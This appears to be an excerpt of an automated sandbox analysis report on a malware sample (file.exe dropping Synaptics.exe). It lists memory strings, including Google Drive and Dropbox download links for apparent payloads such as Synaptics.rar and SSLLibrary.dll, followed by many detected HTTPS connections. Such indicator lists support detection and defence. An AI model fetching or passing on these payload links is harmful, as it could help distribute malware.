                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvqQ
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwP
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwS
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxC
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxL
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxT
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxd
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady-
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyS
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyc
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyg
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..t
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyout
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyp
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz0
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzM
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzW
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzl
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~1
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~2
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~N
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~m
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~ts
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.use
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNt
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ0cs
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc;
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
